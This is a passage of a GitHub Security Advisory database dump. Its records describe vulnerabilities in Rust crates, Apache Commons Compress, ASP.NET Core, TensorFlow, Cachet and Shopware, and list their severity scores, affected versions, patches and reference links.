'https://groups.google.com/g/rustlang-security-announcements/c/3-sO6of29O0'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0001.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:06:53Z', 'nvd_published_at': '2021-01-04T19:15:00Z'}" +1.4.0,GHSA-7hfm-57qf-j43q,2022-02-08T21:08:33Z,2021-08-02T16:55:07Z,,['CVE-2021-35515'],Excessive Iteration in Compress,"When reading a specially crafted 7Z archive, the construction of the list of codecs that decompress an entry can result in an infinite loop. This could be used to mount a denial of service attack against services that use Compress' sevenz package.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.commons:commons-compress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.21'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35515'}, {'type': 'WEB', 'url': 'https://commons.apache.org/proper/commons-compress/security-reports.html'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r19ebfd71770ec0617a9ea180e321ef927b3fefb4c81ec5d1902d20ab%40%3Cuser.commons.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rab292091eadd1ecc63c516e9541a7f241091cf2e652b8185a6059945@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbaea15ddc5a7c0c6b66660f1d6403b28595e2561bb283eade7d7cd69@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbe91c512c5385181149ab087b6c909825d34299f5c491c6482a2ed57@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf2f4d7940371a7c7c5b679f50e28fc7fcc82cd00670ced87e013ac88@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211022-0001/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/07/13/1'}]","{'cwe_ids': ['CWE-834', 'CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-14T17:35:41Z', 'nvd_published_at': '2021-07-13T08:15:00Z'}" +1.4.0,GHSA-g4rw-8m5q-6453,2023-06-13T20:26:14Z,2021-08-25T20:45:12Z,,['CVE-2020-25016'],Out of bounds access in rgb,"Affected versions of rgb crate allow viewing and modifying data of any type T wrapped in RGB as bytes, and do not correctly constrain RGB and other wrapper structures to the types for which it is safe to do so. + +Safety violation possible for a type wrapped in RGB and similar wrapper structures: + +* If T contains padding, viewing it as bytes may lead to exposure of contents of uninitialized memory. +* If T contains a pointer, modifying it as bytes may lead to dereferencing of arbitrary pointers. +* Any safety and/or validity invariants for T may be violated. + +The issue was resolved by requiring all types wrapped in structures provided by RGB crate to implement an unsafe marker trait.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rgb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.5.4'}, {'fixed': '0.8.20'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25016'}, {'type': 'WEB', 'url': 'https://github.com/kornelski/rust-rgb/issues/35'}, {'type': 'PACKAGE', 'url': 'https://github.com/kornelski/rust-rgb'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0029.html'}]","{'cwe_ids': ['CWE-119', 'CWE-843'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:21:37Z', 'nvd_published_at': None}" +1.4.0,GHSA-v42f-j8fx-99f3,2021-08-24T17:58:36Z,2021-08-25T21:00:13Z,2021-08-24T17:58:36Z,[],Queue should have a Send bound on its Send/Sync traits,"Affected versions of this crate unconditionally implements `Send`/`Sync` for `Queue`. + +This allows (1) creating data races to a `T: !Sync` and (2) sending `T: !Send` to other threads, resulting in memory corruption or other undefined behavior. +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'scottqueue'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rossdylan/rust-scottqueue/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/rossdylan/rust-scottqueue'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0133.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-06T18:34:31Z', 'nvd_published_at': None}" +1.4.0,GHSA-9mxw-4856-9cm5,2023-06-13T20:46:48Z,2021-08-25T20:50:51Z,,['CVE-2020-36206'],Data races in rusb,"Affected versions of rusb did not require UsbContext to implement Send and Sync. However, through Device and DeviceHandle it is possible to use UsbContexts across threads. This issue allows non-thread safe UsbContext types to be used concurrently leading to data races and memory corruption. The issue was fixed by adding Send and Sync bounds to UsbContext.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rusb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36206'}, {'type': 'WEB', 'url': 'https://github.com/a1ien/rusb/issues/44'}, {'type': 'PACKAGE', 'url': 'https://github.com/a1ien/rusb'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0098.html'}]","{'cwe_ids': ['CWE-662', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:51:05Z', 'nvd_published_at': None}" +1.4.0,GHSA-w9vv-q986-vj7x,2021-08-19T17:09:13Z,2021-08-25T20:54:24Z,,['CVE-2021-29934'],Out of bounds read in uu_od,An issue was discovered in PartialReader in the uu_od crate before 0.0.4 for Rust. Attackers can read the contents of uninitialized memory locations via a user-provided Read operation.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'uu_od'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29934'}, {'type': 'WEB', 'url': 'https://github.com/uutils/coreutils/issues/1729'}, {'type': 'WEB', 'url': 'https://github.com/uutils/coreutils/pull/1730'}, {'type': 'WEB', 'url': 'https://github.com/uutils/coreutils/pull/1738'}, {'type': 'WEB', 'url': 'https://github.com/uutils/coreutils/pull/1739'}, {'type': 'WEB', 'url': 'https://github.com/uutils/coreutils/commit/39d62c6c1f809022c903180471c10fde6ecd12d1'}, {'type': 'WEB', 'url': 'https://github.com/uutils/coreutils/commit/5935876f38498b0c1f657d031171eb17028def6f'}, {'type': 'WEB', 'url': 'https://github.com/uutils/coreutils/commit/7341a1a033aa5980ac59bc9d4df978b396de4fad'}, {'type': 'PACKAGE', 'url': 'https://github.com/uutils/coreutils'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0043.html'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:09:13Z', 'nvd_published_at': '2021-04-01T05:15:00Z'}" +1.4.0,GHSA-32v7-ghpr-c8hg,2023-06-13T18:30:35Z,2021-08-25T20:58:47Z,,['CVE-2019-15547'],Mishandling of format strings in ncurses,"ncurses exposes functions from the ncurses library which: +* Pass buffers without length to C functions that may write an arbitrary amount of data, leading to a buffer overflow. (instr, mvwinstr, etc) +* Passes rust &str to strings expecting C format arguments, allowing hostile input to execute a format string attack, which trivially allows writing arbitrary data to stack memory (functions in the printw family). +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ncurses'}, 'ecosystem_specific': {'affected_functions': ['ncurses::instr', 'ncurses::mvprintw', 'ncurses::mvwinstr', 'ncurses::mvwprintw', 'ncurses::printw']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.101.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15547'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/issues/106'}, {'type': 'WEB', 'url': 'https://github.com/jeaye/ncurses-rs/issues/172'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeaye/ncurses-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0006.html'}]","{'cwe_ids': ['CWE-134'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T17:45:13Z', 'nvd_published_at': None}" +1.4.0,GHSA-9wgh-vjj7-7433,2023-06-13T18:17:31Z,2021-08-25T20:49:54Z,,['CVE-2020-35916'],Mutable reference with immutable provenance in image,"A mutable reference to a struct was constructed by dereferencing a pointer obtained from slice::as_ptr. Instead, slice::as_mut_ptr should have been called on the mutable slice argument. The former performs an implicit reborrow as an immutable shared reference which does not allow writing through the derived pointer.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'image'}, 'ecosystem_specific': {'affected_functions': ['image::Bgr::from_slice_mut', 'image::Bgra::from_slice_mut', 'image::Luma::from_slice_mut', 'image::LumaA::from_slice_mut', 'image::Rgb::from_slice_mut', 'image::Rgba::from_slice_mut']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.23.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35916'}, {'type': 'WEB', 'url': 'https://github.com/image-rs/image/issues/1357'}, {'type': 'WEB', 'url': 'https://github.com/image-rs/image/pull/1358'}, {'type': 'WEB', 'url': 'https://github.com/image-rs/image/commit/5cbe1e6767d11aff3f14c7ad69a06b04e8d583c7'}, {'type': 'PACKAGE', 'url': 'https://github.com/image-rs/image'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0073.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:49:50Z', 'nvd_published_at': None}" +1.4.0,GHSA-q7cg-43mg-qp69,2022-08-11T14:54:06Z,2021-08-25T14:45:28Z,,['CVE-2021-34532'],ASP.NET Core Information Disclosure Vulnerability,"Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 5.0, .NET Core 3.1 and .NET Core 2.1. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. + +An information disclosure vulnerability exists in .NET 5.0, .NET Core 3.1 and .NET Core 2.1 where a JWT token is logged if it cannot be parsed. + +### Patches + +* If you're using .NET 5.0, you should download and install Runtime 5.0.9 or SDK 5.0.206 (for Visual Studio 2019 v16.8) or SDK 5.0.303 (for Visual Studio 2019 V16.10) from https://dotnet.microsoft.com/download/dotnet-core/5.0. + +* If you're using .NET Core 3.1, you should download and install Runtime 3.1.18 or SDK 3.1.118 (for Visual Studio 2019 v16.4) or 3.1.412 (for Visual Studio 2019 v16.7 or later) from https://dotnet.microsoft.com/download/dotnet-core/3.1. + +* If you're using .NET Core 2.1, you should download and install Runtime 2.1.29 or SDK 2.1.525 (for Visual Studio 2019 v15.9) or 2.1.817 from https://dotnet.microsoft.com/download/dotnet-core/2.1. + +* If your application is using .NET Core 2.1 running on .NET Framework see the [Updating .NET Core 2.1 on .NET Framework](#updating-2.1) section below. + +### Updating .NET Core 2.1 on .NET Framework +If you are running .NET Core 2.1 on .NET Framework you need to check your projects for dependencies and update them accordingly. + +#### Direct dependencies + +Direct dependencies are discoverable by examining your `csproj` file. They can be fixed by [editing the project file](#fixing-direct-dependencies) or using NuGet to update the dependency. + +#### Transitive dependencies + +Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package `Contoso.Utility` which, in turn, depends on `Contoso.Internals` and you add the `Contoso.Utility` package to your project now your project has a direct dependency on `Contoso.Utility` and, because `Contoso.Utility` depends 'Contoso.Internals', your application gains a transitive dependency on the `Contoso.Internals` package. + +Transitive dependencies are reviewable in two ways: + +* In the Visual Studio Solution Explorer window, which supports searching. +* By examining the `project.assets.json` file contained in the obj directory of your project for `csproj` based projects + +The `project.assets.json` files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. + +There are two ways to view transitive dependencies. You can either [use Visual Studio’s Solution Explorer](#vs-solution-explorer), or you can review [the `project.assets.json` file](#project-assets-json)). + +##### Using Visual Studio Solution Explorer + +To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the [vulnerable package](#affected-software) and make a note of the version numbers of any results you find. + +For example, search for `Microsoft.AspNetCore.Authentication.JwtBearer` and update the package to the latest version + + +##### Manually reviewing project.assets.json + +Open the *project.assets.json* file from your project’s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. +Visual Studio and Visual Studio Code provide JSON friendly editing. + +Search the *project.assets.json* file for the [vulnerable package](#affected-software), using the format `packagename/` for each of the package names from the preceding table. If you find the assembly name in your search: + +* Examine the line on which they are found, the version number is after the `/`. +* Compare to the [vulnerable versions table](#affected-software). + +For example, a search result that shows `Microsoft.AspNetCore.Authentication.JwtBearer/2.1.0` is a reference to version 2.1.1 of `Microsoft.AspNetCore.Authentication.JwtBearer`. + +If your *project.assets.json* file includes references to the [vulnerable package](#affected-software), then you need to fix the transitive dependencies. + +If you have not found any reference to any vulnerable packages, this means either + +* None of your direct dependencies depend on any vulnerable packages, or +* You have already fixed the problem by updating the direct dependencies. + +#### Other Details + +- Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/195 +- An Issue for this can be found at https://github.com/dotnet/aspnetcore/issues/35246 +- MSRC details for this can be found at https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34532 +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.Authentication.JwtBearer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.29'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.Authentication.JwtBearer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.18'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.Authentication.JwtBearer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/aspnetcore/security/advisories/GHSA-q7cg-43mg-qp69'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34532'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/aspnetcore'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34532'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T18:52:16Z', 'nvd_published_at': '2021-08-12T18:15:00Z'}" +1.4.0,GHSA-qpjr-ch72-2qq4,2023-06-13T20:35:06Z,2021-08-25T20:45:17Z,,['CVE-2019-16881'],Use after free in portaudio-rs,"Affected versions of this crate is not panic safe within callback functions stream_callback and stream_finished_callback. The call to user-provided closure might panic before a mem::forget call, which then causes a use after free that grants attacker to control the callback function pointer. This allows an attacker to construct an arbitrary code execution .","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'portaudio-rs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16881'}, {'type': 'WEB', 'url': 'https://github.com/mvdnes/portaudio-rs/issues/20'}, {'type': 'WEB', 'url': 'https://github.com/mvdnes/portaudio-rs/commit/7466df019f6739732fd91401017942c22364ef61'}, {'type': 'PACKAGE', 'url': 'https://github.com/mvdnes/portaudio-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0022.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:21:17Z', 'nvd_published_at': None}" +1.4.0,GHSA-wrvc-72w7-xpmj,2023-08-25T00:12:27Z,2021-08-25T20:45:54Z,,['CVE-2019-25002'],Incorrect Comparison in sodiumoxide,An issue was discovered in the sodiumoxide crate starting with 0.2.0 and prior to 0.2.5 for Rust. `generichash::Digest::eq` compares itself to itself and thus has degenerate security properties.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'sodiumoxide'}, 'ecosystem_specific': {'affected_functions': ['sodiumoxide::crypto::generichash::Digest::eq', 'sodiumoxide::crypto::generichash::Digest::ne']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.0'}, {'fixed': '0.2.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25002'}, {'type': 'WEB', 'url': 'https://github.com/sodiumoxide/sodiumoxide/pull/381'}, {'type': 'WEB', 'url': 'https://github.com/sodiumoxide/sodiumoxide/pull/381/commits/fae052b834b097ced9a89a8fff8466e18f383070'}, {'type': 'WEB', 'url': 'https://github.com/sodiumoxide/sodiumoxide/commit/38490723927f230498adf795153e6cd3cb08b6a8'}, {'type': 'PACKAGE', 'url': 'https://github.com/sodiumoxide/sodiumoxide'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0026.html'}]","{'cwe_ids': ['CWE-697'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:20:40Z', 'nvd_published_at': None}" +1.4.0,GHSA-wf5p-c75w-w3wh,2021-08-24T17:58:35Z,2021-08-25T14:39:36Z,,['CVE-2021-37689'],Null pointer dereference in TFLite MLIR optimizations,"### Impact +An attacker can craft a TFLite model that would trigger a null pointer dereference, which would result in a crash and denial of service: + +This is caused by the MLIR optimization of `L2NormalizeReduceAxis` operator. The [implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/compiler/mlir/lite/transforms/optimize.cc#L67-L70) unconditionally dereferences a pointer to an iterator to a vector without checking that the vector has elements: + +```cc +bool L2NormalizeReduceAxis(Value sq_op, DenseElementsAttr axis) { + if (sq_op.getType().cast().getRank() - 1 == + *axis.getValues().begin() || + *axis.getValues().begin() == -1) { + // ... + } + // ... +} +``` + +### Patches +We have patched the issue in GitHub commit [d6b57f461b39fd1aa8c1b870f1b974aac3554955](https://github.com/tensorflow/tensorflow/commit/d6b57f461b39fd1aa8c1b870f1b974aac3554955). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang of Baidu Security.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-wf5p-c75w-w3wh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37689'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/d6b57f461b39fd1aa8c1b870f1b974aac3554955'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T17:58:35Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}" +1.4.0,GHSA-r7rv-2rph-hvhj,2021-08-19T18:48:19Z,2021-08-25T20:51:45Z,,['CVE-2020-36218'],Improper synchronization in buttplug,"An issue was discovered in the buttplug crate before 1.0.4 for Rust. ButtplugFutureStateShared does not properly consider (!Send|!Sync) objects, leading to a data race.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'buttplug'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36218'}, {'type': 'WEB', 'url': 'https://github.com/buttplugio/buttplug-rs/issues/225'}, {'type': 'PACKAGE', 'url': 'https://github.com/buttplugio/buttplug-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0112.html'}]","{'cwe_ids': ['CWE-662'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:48:19Z', 'nvd_published_at': None}" +1.4.0,GHSA-79mg-4w23-4fqc,2021-08-27T12:54:52Z,2021-08-30T16:12:58Z,,['CVE-2021-39165'],Unauthenticated SQL Injection in Cachet,"### Impact +In Cachet versions through 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. + +### Patches + +The original repository of [https://github.com/CachetHQ/Cachet](https://github.com/CachetHQ/Cachet) is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected. + +Update to version 2.5 or later in the [https://github.com/fiveai/Cachet fork](https://github.com/fiveai/Cachet) to fix this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cachethq/cachet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.3.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fiveai/Cachet/security/advisories/GHSA-79mg-4w23-4fqc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39165'}, {'type': 'WEB', 'url': 'https://github.com/fiveai/Cachet/commit/27bca8280419966ba80c6fa283d985ddffa84bb6'}]","{'cwe_ids': ['CWE-287', 'CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T20:21:00Z', 'nvd_published_at': '2021-08-26T21:15:00Z'}" +1.4.0,GHSA-gcvv-gq92-x94r,2021-08-23T17:22:58Z,2021-08-23T19:42:49Z,,['CVE-2021-37711'],Authenticated server-side request forgery in file upload via URL.,"### Impact +Authenticated server-side request forgery in file upload via URL. + +### Patches +We recommend updating to the current version 6.4.3.1. You can get the update to 6.4.3.1 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +### Workarounds +For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.3.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.3.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-gcvv-gq92-x94r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37711'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/b9f330e652b743dd2374c02bbe68f28b59a3f502'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T17:22:58Z', 'nvd_published_at': '2021-08-16T23:15:00Z'}" +1.4.0,GHSA-56cx-wf47-hx7w,2023-07-06T21:34:16Z,2021-08-09T20:38:37Z,,['CVE-2021-3663'], No Restriction of Excessive Authentication Attempts in Firefly III,firefly-iii is vulnerable to Improper Lack of Restriction of Excessive Authentication Attempts,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.5.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3663'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/afc9f4b7ebc8a240c85864a6e1abda62bfeefae8'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/releases/tag/5.5.13'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/497bdf6d-7dba-49c3-8011-1c64dfbb3380'}]","{'cwe_ids': ['CWE-307'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T22:13:58Z', 'nvd_published_at': '2021-07-25T14:15:00Z'}" +1.4.0,GHSA-q948-x8rf-888m,2023-06-13T20:12:22Z,2021-08-25T20:47:55Z,,['CVE-2020-35865'],os_str_bytes relies on undefined behavior of 